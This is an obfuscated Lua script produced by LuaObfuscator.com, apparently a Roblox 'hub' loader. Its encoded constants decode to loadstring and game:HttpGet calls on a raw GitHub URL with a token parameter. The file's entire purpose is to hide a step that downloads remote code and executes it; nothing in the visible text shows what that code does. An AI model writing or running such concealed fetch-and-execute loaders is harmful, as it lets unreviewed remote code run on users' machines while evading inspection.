--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v88=v5(v82,v19);v19=nil;return v88;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(0 + 0) -0 ;local v84;while true do if (v83==0) then v84=(v31/((1 + 1)^(v32-(878 -(282 + 595)))))%((5 -3)^(((v33-(1 -0)) -(v32-(1 + 0))) + (2 -1))) ;return v84-(v84%(620 -(124 + 431 + 64))) ;end end else local v85=(933 -(857 + 74))^(v32-(569 -(367 + (1158 -(892 + 65))))) ;return (((v31%(v85 + v85))>=v85) and (928 -(214 + 713))) or 0 ;end end local function v21() local v34=0;local v35;while true do if (v34==(2 -1)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=1 -0 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (352 -(87 + 263)) ;return (v37 * (436 -(67 + 113))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -5) ;return (v41 * 16777216) + (v40 * (48199 + 17337)) + (v39 * (1017 -761)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=3 -(7 -5) ;local v45=(v20(v43,1,972 -(802 + 150) ) * (((1576 -1132) -(416 + 26))^32)) + v42 ;local v46=v20(v43,(915 -(814 + 45)) -35 ,55 -24 );local v47=((v20(v43,24 + 8 )==1) and  -(1 -0)) or (998 -((2254 -1339) + 82)) ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else local v89=1187 -(1069 + 118) ;while true do if (v89==(0 -0)) then v46=1 + 0 ;v44=(0 + 0) -0 ;break;end end end elseif (v46==(356 + 1691)) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/((280 + 511) -(368 + 423))))) or (v47 * NaN) ;end return v8(v47,v46-(3214 -2191) ) * (v44 + (v45/(2^(70 -(10 + 8))))) ;end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(885 -(261 + 624))) then return "";end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v65=1081 -(1020 + 60) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 0 -0 ;end)();while true do if (v67~=0) then else if (v51~=2) then else v56[ #"-19"]=(function() return v21();end)();for v98= #"}",v23() do local v99=(function() return v21();end)();if (v20(v99, #"{", #"}")==(0 + 0)) then local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v106~=0) then else local v135=(function() return 0 -0 ;end)();while true do if (v135~=1) then else v106=(function() return 1 -0 ;end)();break;end if (v135==(0 -0)) then v107=(function() return 0;end)();v108=(function() return nil;end)();v135=(function() return 1;end)();end end end if (v106==2) then while true do if (v107~=0) then else local v171=(function() return 0;end)();local v172=(function() return;end)();while true do if ((285 -(134 + 151))~=v171) then else v172=(function() return 1665 -(970 + 695) ;end)();while true do if (v172==(1 -0)) then v107=(function() return  #"{";end)();break;end if (v172==(1990 -(582 + 1408))) then v108=(function() return v20(v99,2, #"xxx");end)();v109=(function() return v20(v99, #"xnxx",20 -14 );end)();v172=(function() return 1 -0 ;end)();end end break;end end end if (v107== #"19(") then if (v20(v109, #"xxx", #"xnx")== #"/") then v110[ #"0836"]=(function() return v58[v110[ #"?id="]];end)();end v53[v98]=(function() return v110;end)();break;end if (v107~=(7 -5)) then else local v174=(function() return 0;end)();local v175=(function() return;end)();while true do if (v174~=(1824 -(1195 + 629))) then else v175=(function() return 0;end)();while true do if (v175~=1) then else v107=(function() return  #"xxx";end)();break;end if (v175~=(0 -0)) then else if (v20(v109, #"!", #"|")~= #"|") then else v110[243 -(187 + 54) ]=(function() return v58[v110[782 -(162 + 618) ]];end)();end if (v20(v109,2 + 0 ,2)~= #":") then else v110[ #"xxx"]=(function() return v58[v110[ #"-19"]];end)();end v175=(function() return 1 + 0 ;end)();end end break;end end end if (v107== #"\\") then local v176=(function() return 0;end)();local v177=(function() return;end)();while true do if (v176==0) then v177=(function() return 0;end)();while true do if (v177==1) then v107=(function() return 3 -1 ;end)();break;end if (v177~=(0 -0)) then else v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==(1636 -(1373 + 263))) then local v189=(function() return 1000 -(451 + 549) ;end)();while true do if (v189==(0 + 0)) then v110[ #"xxx"]=(function() return v22();end)();v110[ #"asd1"]=(function() return v22();end)();break;end end elseif (v108== #"}") then v110[ #"nil"]=(function() return v23();end)();elseif (v108==(2 -0)) then v110[ #"91("]=(function() return v23() -(2^16) ;end)();elseif (v108== #"xnx") then local v194=(function() return 0;end)();local v195=(function() return;end)();while true do if (0==v194) then v195=(function() return 0 -0 ;end)();while true do if (v195==0) then v110[ #"-19"]=(function() return v23() -(2^(1400 -(746 + 638))) ;end)();v110[ #"?id="]=(function() return v22();end)();break;end end break;end end end v177=(function() return 1;end)();end end break;end end end end break;end if (v106~=(1 + 0)) then else local v136=(function() return 0;end)();while true do if (v136==1) then v106=(function() return 2;end)();break;end if (v136==0) then v109=(function() return nil;end)();v110=(function() return nil;end)();v136=(function() return 1 -0 ;end)();end end end end end end for v100= #"!",v23() do v54,v100,v28=(function() return v52(v54,v100,v28);end)();end return v56;end if ((342 -(218 + 123))==v51) then v56=(function() return {v53,v54,nil,v55};end)();v57=(function() return v23();end)();v58=(function() return {};end)();for v101= #"{",v57 do local v102=(function() return 0;end)();local v103=(function() return;end)();local v104=(function() return;end)();local v105=(function() return;end)();while true do if (v102==(1582 -(1535 + 46))) then v105=(function() return nil;end)();while true do if (1~=v103) then else if (v104== #"<") then v105=(function() return v21()~=0 ;end)();elseif (v104==2) then v105=(function() return v24();end)();elseif (v104~= #"xnx") then else v105=(function() return v25();end)();end v58[v101]=(function() return v105;end)();break;end if (v103==0) then local v138=(function() return 0 + 0 ;end)();local v139=(function() return;end)();while true do if (v138==0) then v139=(function() return 0;end)();while true do if (v139~=(1 + 0)) then else v103=(function() return 561 -(306 + 254) ;end)();break;end if (v139==(0 + 0)) then v104=(function() return v21();end)();v105=(function() return nil;end)();v139=(function() return 1 -0 ;end)();end end break;end end end end break;end if (v102~=0) then else v103=(function() return 1467 -(899 + 568) ;end)();v104=(function() return nil;end)();v102=(function() return 1 + 0 ;end)();end end end v51=(function() return 2;end)();end v67=(function() return 1;end)();end if (v67==(2 -1)) then if (v51~=0) then else local v97=(function() return 603 -(268 + 335) ;end)();while true do if (v97==(291 -(60 + 230))) then v54=(function() return {};end)();v55=(function() return {};end)();v97=(function() return 2;end)();end if (v97==(572 -(426 + 146))) then v52=(function() return function(v111,v112,v113) local v114=(function() return 0 + 0 ;end)();while true do if (v114==0) then local v140=(function() return 0;end)();local v141=(function() return;end)();while true do if (v140~=0) then else v141=(function() return 0;end)();while true do if (v141==(1456 -(282 + 1174))) then v111[v112-#"~" ]=(function() return v113();end)();return v111,v112,v113;end end break;end end end end end;end)();v53=(function() return {};end)();v97=(function() return 1;end)();end if (v97~=2) then else v51=(function() return 812 -(569 + 242) ;end)();break;end end end break;end end end end local function v29(v59,v60,v61) local v62=v59[2 -1 ];local v63=v59[1 + 1 ];local v64=v59[1027 -(706 + 318) ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1252 -(721 + 530) ;local v73= -(1272 -(945 + 326));local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if ((v86>=v70) or (3151<1284)) then v74[v86-v70 ]=v75[v86 + (2 -1) ];else v78[v86]=v75[v86 + 1 + 0 ];end end local v79=(v76-v70) + (701 -(271 + 429)) ;local v80;local v81;while true do local v87=0 + (0 -0) ;while true do if ((v87==((1322 + 178) -(1408 + 92))) or (1850==1529)) then v80=v68[v72];v81=v80[(1079 + 8) -(461 + 625) ];v87=1289 -(993 + 295) ;end if ((821<2123) and ((1 + 0)==v87)) then if ((902<2325) and (v81<=(1174 -(418 + 753)))) then if ((858<=2962) and (v81<=(1 + 0))) then if (v81>(0 + 0)) then v78[v80[1 + 1 ]]();else v78[v80[1 + 1 ]]=v61[v80[532 -(406 + 123) ]];end elseif ((v81==(1771 -(1019 + 730 + 20))) or (3946<1288)) then local v117=0 + 0 ;local v118;local v119;local v120;local v121;while true do if (v117==1) then v73=(v120 + v118) -(1323 -(1249 + 73)) ;v121=0 + 0 ;v117=2;end if ((v117==(1147 -(466 + 679))) or (3242==567)) then for v178=v118,v73 do v121=v121 + (2 -1) ;v78[v178]=v119[v121];end break;end if (v117==((0 + 0) -0)) then v118=v80[2];v119,v120=v71(v78[v118](v13(v78,v118 + 1 ,v80[1903 -(106 + 1794) ])));v117=1 + 0 + 0 ;end end else v78[v80[(2 -1) + 1 ]]=v80[3];end elseif (v81<=((38 -24) -9)) then if ((v81==4) or (847>=1263)) then local v124=(0 -0) -0 ;local v125;local v126;local v127;local v128;local v129;while true do if (v124==(117 -(4 + 110))) then v78[v129 + (585 -(57 + 527)) ]=v128;v78[v129]=v128[v80[4]];v72=v72 + ((416 + 1012) -(41 + 1386)) ;v80=v68[v72];v124=(517 -410) -(17 + 86) ;end if (v124==((756 -(239 + 514)) + 1)) then v78[v80[3 -1 ]]=v80[(3 + 5) -5 ];v72=v72 + (167 -(122 + 44)) ;v80=v68[v72];v129=v80[2 -0 ];v124=16 -11 ;end if ((v124==(5 + 0)) or (2253==1851)) then v126,v127=v71(v78[v129](v13(v78,v129 + 1 + 0 ,v80[5 -2 ])));v73=(v127 + v129) -(66 -(30 + 35)) ;v125=0 + 0 ;for v181=v129,v73 do local v182=1257 -(1043 + 214) ;while true do if (v182==0) then v125=v125 + (3 -2) ;v78[v181]=v126[v125];break;end end end v124=6;end if (v124==(1214 -(323 + 889))) then v72=v72 + 1 ;v80=v68[v72];v129=v80[5 -3 ];v128=v78[v80[(1912 -(797 + 532)) -(361 + 219) ]];v124=323 -(39 + 14 + 267) ;end if (v124==(2 + 5)) then v72=v72 + 1 ;v80=v68[v72];v78[v80[(141 + 274) -(15 + 398) ]]();v72=v72 + (983 -(18 + 964)) ;v124=8;end if (v124==(22 -16)) then v72=v72 + 1 ;v80=v68[v72];v129=v80[2 + 0 ];v78[v129]=v78[v129](v13(v78,v129 + 1 + 0 ,v73));v124=857 -(20 + 830) ;end if (v124==(0 + 0)) then v125=nil;v126,v127=nil;v128=nil;v129=nil;v124=1;end if (v124==(134 -(116 + 10))) then v80=v68[v72];do return;end break;end if (v124==((2 -1) + 0)) then v78[v80[740 -(542 + 196) ]]=v61[v80[6 -(1205 -(373 + 829)) ]];v72=v72 + (732 -(476 + 255)) + (1130 -(369 + 761)) ;v80=v68[v72];v78[v80[2 + 0 ]]=v61[v80[3]];v124=1 + 1 ;end end else do return;end end elseif ((v81>(15 -9)) or (2087>2372)) then local v130=0 -0 ;local v131;local v132;while true do if (v130==1) then v78[v131 + (1552 -(1126 + 425)) ]=v132;v78[v131]=v132[v80[4]];break;end if ((405 -(118 + 287))==v130) then v131=v80[(5 + 2) -5 ];v132=v78[v80[1124 -(118 + 1003) ]];v130=2 -(1 -0) ;end end else local v133=0;local v134;while true do if ((v133==(377 -(142 + 235))) or (4445<4149)) then v134=v80[9 -7 ];v78[v134]=v78[v134](v13(v78,v134 + 1 + 0 ,v73));break;end end end v72=v72 + (978 -(553 + 424)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574037E3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F46697A2O732F4E6F6E46757363617465642F6D61696E2F46544E4D25323048756225323056322E352E33353F746F6B656E3D4748534154306O4143573252365759584F49524E324E33454F5A2O505643555A5846434A545100083O0012043O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
